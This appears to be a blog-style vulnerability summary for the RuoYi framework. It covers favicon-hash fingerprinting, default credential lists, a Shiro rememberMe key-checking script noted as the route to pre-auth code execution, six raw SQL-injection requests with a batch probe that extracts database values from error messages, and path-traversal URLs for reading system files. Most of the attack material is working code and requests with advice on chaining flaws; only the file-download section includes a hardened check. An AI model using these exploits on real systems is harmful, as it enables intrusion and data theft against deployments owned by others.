
RuoYi framework vulnerability summary


0x01 Fingerprinting
Green RuoYi
icon_hash="706913071"

Blue RuoYi
icon_hash="-1231872293"
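The two icon_hash values above are search-engine (FOFA syntax) fingerprints of the login-page favicon. To reproduce such a value for a favicon you have in hand, or to fingerprint a fork that has swapped the icon, compute it the same way the engines do: MurmurHash3 (x86, 32-bit, signed result) over the base64 text of the favicon bytes, line-wrapped at 76 columns with a trailing newline, which is exactly what Python's base64.encodebytes() emits and what the mmh3 library would hash. The block below is an added example, not code from the original post or from RuoYi; it implements the hash in the standard library so it runs without mmh3, and the sample bytes in the __main__ block are constructed, not a real favicon.

```python
"""Compute a FOFA/Shodan-style icon_hash for a favicon (pure standard library)."""
import base64
import urllib.request

_MASK = 0xFFFFFFFF


def _rotl32(x: int, r: int) -> int:
    return ((x << r) | (x >> (32 - r))) & _MASK


def murmurhash3_32(data: bytes, seed: int = 0) -> int:
    """MurmurHash3_x86_32 as in the reference implementation, returned as a
    signed 32-bit int so the value matches mmh3.hash() and the engines' output."""
    c1, c2 = 0xCC9E2D51, 0x1B873593
    h1 = seed & _MASK
    nblocks = len(data) // 4
    for i in range(nblocks):                      # 4-byte little-endian blocks
        k1 = int.from_bytes(data[4 * i:4 * i + 4], "little")
        k1 = (k1 * c1) & _MASK
        k1 = _rotl32(k1, 15)
        k1 = (k1 * c2) & _MASK
        h1 ^= k1
        h1 = _rotl32(h1, 13)
        h1 = (h1 * 5 + 0xE6546B64) & _MASK
    tail = data[nblocks * 4:]                     # 0..3 trailing bytes
    k1 = 0
    if len(tail) >= 3:
        k1 ^= tail[2] << 16
    if len(tail) >= 2:
        k1 ^= tail[1] << 8
    if len(tail) >= 1:
        k1 ^= tail[0]
        k1 = (k1 * c1) & _MASK
        k1 = _rotl32(k1, 15)
        k1 = (k1 * c2) & _MASK
        h1 ^= k1
    h1 ^= len(data)                               # finalisation mix (fmix32)
    h1 ^= h1 >> 16
    h1 = (h1 * 0x85EBCA6B) & _MASK
    h1 ^= h1 >> 13
    h1 = (h1 * 0xC2B2AE35) & _MASK
    h1 ^= h1 >> 16
    return h1 - (1 << 32) if h1 & 0x80000000 else h1


def icon_hash(favicon: bytes) -> int:
    """Hash the favicon the way FOFA/Shodan do: over its base64 text, not raw bytes.
    encodebytes() wraps at 76 columns and appends a newline; that is part of the input."""
    return murmurhash3_32(base64.encodebytes(favicon))


def fofa_query(favicon: bytes) -> str:
    """Search query string for the given favicon, in the syntax used above."""
    return f'icon_hash="{icon_hash(favicon)}"'


def fetch_icon_hash(favicon_url: str, timeout: float = 10) -> int:
    """Download a favicon (e.g. http://target/favicon.ico) and hash it."""
    req = urllib.request.Request(favicon_url, headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return icon_hash(resp.read())


if __name__ == "__main__":
    # Constructed sample input, not a real favicon; any bytes demonstrate the pipeline.
    sample = b"\x00\x00\x01\x00" + b"fake icon data " * 8
    print(fofa_query(sample))
```

Hash the bytes of the target's favicon exactly as served (no re-encoding of the image), otherwise the value will not match what the search engine indexed.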

0x02 Vulnerabilities

Weak credentials

Usernames: admin, ruoyi, druid
Passwords: 123456, admin, druid, admin123, admin888

Try these on the application login; the druid pair applies to the Druid monitoring console (/druid/index.html), which has its own login separate from the application's.

Shiro rememberMe command execution via the default key (pre-auth)
RuoYi authenticates with Apache Shiro, so the classic Shiro rememberMe deserialization attack applies: anyone who knows the AES key used to encrypt the rememberMe cookie can send a cookie carrying an encrypted gadget chain and get a shell, with no login required.

Affected versions
RuoYi < V4.6.2

Key location
[screenshot in the original post]

Default key
[screenshot in the original post]

Starting with RuoYi 4.6.2 the key is generated at random instead of being fixed; a fixed key now has to be set explicitly by the developer. From 4.6.2 onward, therefore, the attack is not possible unless the key has been obtained some other way (a leaked configuration or source tree, for example).

RuoYi 4.2 moved to shiro 1.4.2, which encrypts the rememberMe cookie with AES-GCM instead of AES-CBC, so for 4.2 and later the exploitation tool must be set to AES GCM mode; versions before 4.2 use CBC.
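The following added example (not code from the original post or from RuoYi) shows what a rememberMe key check actually does: serialize an empty SimplePrincipalCollection, encrypt it with the candidate key in the mode that matches the Shiro version, and send it as the rememberMe cookie. Shiro answers a cookie it cannot decrypt or deserialize with Set-Cookie: rememberMe=deleteMe, so the absence of that header means the key is right; the same construction carries a gadget chain instead of the empty collection. In RuoYi the key is set in the framework module's ShiroConfig (the rememberMeManager() bean's setCipherKey call). Assumptions: pycryptodome supplies AES (imported only when a cookie is built), the target URL and key are placeholders, and the IV || ciphertext [|| tag] layout is that of Shiro's AesCipherService.

```python
"""Shiro rememberMe key check: build the cookie, read the deleteMe signal."""
import base64
import urllib.error
import urllib.request


def empty_principal_collection() -> bytes:
    """Java serialization of an empty org.apache.shiro.subject.SimplePrincipalCollection.
    Harmless on purpose: Shiro deserializes it cleanly, so the only observable
    difference between a right and a wrong key is the deleteMe cookie."""
    cls = b"org.apache.shiro.subject.SimplePrincipalCollection"
    field, ftype = b"realmPrincipals", b"Ljava/util/Map;"
    return (b"\xac\xed\x00\x05"                                   # STREAM_MAGIC, version 5
            + b"\x73\x72" + len(cls).to_bytes(2, "big") + cls     # TC_OBJECT, TC_CLASSDESC
            + b"\xa8\x7f\x58\x25\xc6\xa3\x08\x4a"                 # serialVersionUID
            + b"\x03"                                             # SC_WRITE_METHOD | SC_SERIALIZABLE
            + b"\x00\x01"                                         # one field
            + b"L" + len(field).to_bytes(2, "big") + field        # Object field realmPrincipals
            + b"\x74" + len(ftype).to_bytes(2, "big") + ftype     # TC_STRING: field type
            + b"\x78\x70"                                         # TC_ENDBLOCKDATA, no superclass
            + b"\x70"                                             # realmPrincipals = null
            + b"\x77\x01\x00"                                     # writeObject(): writeBoolean(false)
            + b"\x78")                                            # TC_ENDBLOCKDATA


def principal_collection_b64() -> str:
    return base64.b64encode(empty_principal_collection()).decode()


def encrypt_remember_me(key_b64: str, payload: bytes, gcm: bool) -> str:
    """Cookie value Shiro expects: base64(iv || ciphertext [|| tag]).
    Shiro < 1.4.2 uses AES/CBC/PKCS5Padding, 1.4.2+ (RuoYi 4.2+) AES/GCM."""
    from Crypto.Cipher import AES                     # pycryptodome, assumed installed
    from Crypto.Random import get_random_bytes
    from Crypto.Util.Padding import pad
    key = base64.b64decode(key_b64)
    iv = get_random_bytes(16)
    if gcm:
        cipher = AES.new(key, AES.MODE_GCM, nonce=iv)
        ct, tag = cipher.encrypt_and_digest(payload)
        blob = iv + ct + tag
    else:
        blob = iv + AES.new(key, AES.MODE_CBC, iv).encrypt(pad(payload, 16))
    return base64.b64encode(blob).decode()


def key_rejected(set_cookie_headers) -> bool:
    """Shiro clears a cookie it cannot decrypt/deserialize with rememberMe=deleteMe."""
    return any(h.strip().startswith("rememberMe=deleteMe") for h in set_cookie_headers)


def check_key(url: str, key_b64: str, gcm: bool) -> bool:
    """True when the candidate key is accepted (no deleteMe in the response)."""
    cookie = "rememberMe=" + encrypt_remember_me(key_b64, empty_principal_collection(), gcm)
    req = urllib.request.Request(url, headers={"Cookie": cookie})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            headers = resp.headers.get_all("Set-Cookie") or []
    except urllib.error.HTTPError as e:
        headers = e.headers.get_all("Set-Cookie") or []
    return not key_rejected(headers)


if __name__ == "__main__":
    # Placeholders: replace with the target and the key under test.
    print(check_key("http://target.example/login", "AAAAAAAAAAAAAAAAAAAAAA==", gcm=True))
```

Send the probe to a page that does not already carry a valid JSESSIONID, otherwise Shiro never consults the rememberMe cookie and the check tells you nothing.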

SQL injection via params[dataScope]

The data-scope filter value (params[dataScope]) is taken from the request and spliced into the mapper SQL with ${} rather than bound with #{}, so every list or export endpoint that applies the data-scope filter is injectable. The endpoints are behind Shiro authentication, so this is post-auth: pair it with the weak credentials or the rememberMe key above. The payloads below are error-based (extractvalue()) and assume a MySQL backend. Fixed in 4.6.2.

  • /system/role/list (<V-4.6.2)
    POC
POST /system/role/list HTTP/1.1
Host: 
Content-Length: 200
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=ddbcb9ac-2a67-46a4-88d8-fbf6a00d53fc
Connection: keep-alive

pageSize=10&pageNum=1&orderByColumn=roleSort&isAsc=asc&roleName=&roleKey=&status=&params%5BbeginTime%5D=&params%5BendTime%5D=&params[dataScope]=and extractvalue(1,concat(0x7e,(select version()),0x7e))


  • /system/role/export (<V-4.6.2)
    POC
POST /system/role/export HTTP/1.1
Host: 
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-alive

params[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))


  • /system/user/list (<V-4.6.2)
    POC
POST /system/user/list HTTP/1.1
Host: 
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-alive

params[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))


  • /system/dept/list (<V-4.6.2)
    POC

POST /system/dept/list HTTP/1.1
Host: 
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-alive

params[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))


  • /system/role/authUser/allocatedList (<V-4.6.2)
    POC

POST /system/role/authUser/allocatedList HTTP/1.1
Host: 
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-alive

params[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))


  • /system/role/authUser/unallocatedList (<V-4.6.2)
    POC
POST /system/role/authUser/unallocatedList HTTP/1.1
Host: 
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-alive

params[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))

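The six endpoints above share one sink, so one probe covers them all. The block below is an added example, not code from the original post or from RuoYi: it POSTs the same error-based payload to each path with the session cookie and the X-Requested-With header the requests above use, then pulls the leaked value out of the MySQL XPATH error text. The base URL and JSESSIONID are placeholders, and SAMPLE_ERROR_RESPONSE is a constructed response whose wording only approximates what a real instance returns.

```python
"""Probe RuoYi (< 4.6.2) params[dataScope] injection points and read the leak."""
import re
import urllib.error
import urllib.parse
import urllib.request

# The six endpoints on this page that splice params[dataScope] into the mapper
# SQL unescaped. All of them require a logged-in session.
DATASCOPE_ENDPOINTS = [
    "/system/role/list",
    "/system/role/export",
    "/system/user/list",
    "/system/dept/list",
    "/system/role/authUser/allocatedList",
    "/system/role/authUser/unallocatedList",
]

# MySQL reports the extractvalue() argument verbatim inside this error message.
_LEAK = re.compile(r"XPATH syntax error: '~(.*?)~'")


def datascope_body(expression: str) -> str:
    """Form body carrying the error-based payload; ~ (0x7e) brackets the leaked value."""
    payload = f"and extractvalue(1,concat(0x7e,({expression}),0x7e))"
    return urllib.parse.urlencode({"params[dataScope]": payload})


def leaked_value(response_text: str):
    """Text between the ~ markers of a MySQL XPATH error, or None if absent."""
    m = _LEAK.search(response_text)
    return m.group(1) if m else None


def probe(base_url: str, jsessionid: str, expression: str = "select version()") -> dict:
    """POST the payload to every endpoint; map endpoint -> leaked value or None."""
    results = {}
    for path in DATASCOPE_ENDPOINTS:
        req = urllib.request.Request(
            base_url.rstrip("/") + path,
            data=datascope_body(expression).encode(),
            headers={
                "Content-Type": "application/x-www-form-urlencoded",
                "X-Requested-With": "XMLHttpRequest",   # RuoYi answers AJAX calls with JSON
                "Cookie": f"JSESSIONID={jsessionid}",
            },
            method="POST",
        )
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                body = resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as e:          # 500 with the SQL error in the body
            body = e.read().decode("utf-8", "replace")
        results[path] = leaked_value(body)
    return results


# Constructed sample of a vulnerable instance's reply (wording approximate).
SAMPLE_ERROR_RESPONSE = (
    '{"msg":"### Error querying database. Cause: java.sql.SQLException: '
    "XPATH syntax error: '~ry-vue~' ### The error may exist in ...\",\"code\":500}"
)


if __name__ == "__main__":
    print(leaked_value(SAMPLE_ERROR_RESPONSE))         # offline demo on the sample
    # print(probe("http://target.example", "replace-with-a-valid-session-id"))
```

A non-vulnerable instance (4.6.2 or later, or one that never binds caller-supplied params into ${}) returns the normal list JSON for every endpoint and leaked_value() yields None throughout; extractvalue() truncates the leaked string at 32 characters, so use substring() for longer values.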

CNVD-2021-01931 arbitrary file download
Affected versions
RuoYi < 4.5.1

The resource parameter is only checked for the /profile prefix, so ../ sequences after the prefix walk out of the upload directory.

Paths

/common/download/resource
/common/download/resource?resource=/profile/../../../../etc/passwd
/common/download/resource?resource=/profile/../../../../Windows/win.ini

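To see why the prefix check lets /profile/../../../../etc/passwd through and what a fix has to do, here is an added model of the handler's path logic in Python; it is not RuoYi's own Java. resolve_vulnerable mirrors the pre-4.5.1 behaviour (accept anything starting with /profile, strip the prefix, concatenate onto the upload directory); resolve_hardened adds the checks a reviewer would require: decode, reject "..", canonicalize, and verify the result is still under the upload directory. PROFILE_DIR is an assumed value for the ruoyi.profile setting.

```python
"""Path-check model for /common/download/resource, vulnerable vs. hardened."""
import posixpath
import urllib.parse

RESOURCE_PREFIX = "/profile"            # public prefix RuoYi maps onto the upload directory
PROFILE_DIR = "/home/ruoyi/uploadPath"  # assumed value of ruoyi.profile


def resolve_vulnerable(resource: str):
    """< 4.5.1 behaviour: prefix check only, then plain concatenation."""
    if not resource.startswith(RESOURCE_PREFIX):
        return None
    return PROFILE_DIR + resource[len(RESOURCE_PREFIX):]


def resolve_hardened(resource: str):
    """Decode, refuse traversal, normalise, and keep the result under PROFILE_DIR."""
    resource = urllib.parse.unquote(resource)          # %2e%2e must not bypass the check
    if not resource.startswith(RESOURCE_PREFIX + "/") or ".." in resource:
        return None
    target = posixpath.normpath(PROFILE_DIR + resource[len(RESOURCE_PREFIX):])
    if not target.startswith(PROFILE_DIR + "/"):       # canonical path escaped the directory
        return None
    return target


def escapes_profile_dir(path: str) -> bool:
    """Where a concatenated path really lands once the OS collapses the '..' components."""
    return not posixpath.normpath(path).startswith(PROFILE_DIR + "/")


if __name__ == "__main__":
    for r in ("/profile/../../../../etc/passwd", "/profile/upload/2021/01/demo.png"):
        print(r, "->", resolve_vulnerable(r), "| hardened:", resolve_hardened(r))
```

The vulnerable variant returns a string for the traversal input and escapes_profile_dir() shows it resolves to /etc/passwd; the hardened variant returns None for it and still serves a legitimate upload path.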

http://www.rkmt.cn/news/7448.html
